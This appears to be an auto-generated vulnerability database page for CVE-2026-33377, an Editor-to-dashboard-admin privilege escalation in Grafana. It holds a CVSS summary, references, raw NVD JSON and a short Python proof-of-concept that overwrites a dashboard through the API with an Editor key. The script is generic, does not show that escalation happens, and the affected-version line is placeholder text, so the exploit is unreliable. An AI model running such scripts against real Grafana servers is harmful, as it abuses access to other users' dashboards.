CVE-2026-33377

Description

An Editor can overwrite a dashboard not owned by them to acquire admin on that specific dashboard. The user must have write access to the dashboard to escalate privilege.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Grafana < 版本号请参考官方安全公告

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-33377 PoC: Grafana Privilege Escalation
# Target: Grafana Instance
# Pre-condition: Attacker has Editor role and write access to a dashboard.

TARGET_URL = "http://localhost:3000"
API_KEY = "YOUR_EDITOR_API_KEY" # Editor role API key
DASHBOARD_UID = "target_dashboard_uid" # The dashboard to overwrite

# Payload to update dashboard and potentially escalate privileges
payload = {
    "dashboard": {
        "id": None,
        "uid": DASHBOARD_UID,
        "title": "Overwritten Dashboard",
        "tags": ["poc"],
        "timezone": "browser",
        "schemaVersion": 16,
        "version": 0
    },
    "overwrite": True,
    "message": "Updating dashboard via PoC"
}

headers = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json"
}

try:
    response = requests.post(
        f"{TARGET_URL}/api/dashboards/db",
        headers=headers,
        data=json.dumps(payload)
    )
    if response.status_code == 200:
        print("[+] Dashboard overwritten successfully. Check if privileges escalated.")
    else:
        print(f"[-] Failed: {response.status_code} - {response.text}")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33377
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33377
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33377/
[4] VulDB https://vuldb.com/cve/CVE-2026-33377
[5] https://grafana.com/security/security-advisories/cve-2026-33377

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33377", "sourceIdentifier": "[email protected]", "published": "2026-05-13T20:16:20.470", "lastModified": "2026-05-14T19:16:32.217", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Editor can overwrite a dashboard not owned by them to acquire admin on that specific dashboard. The user must have write access to the dashboard to escalate privilege."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://grafana.com/security/security-advisories/cve-2026-33377", "source": "[email protected]"}]}}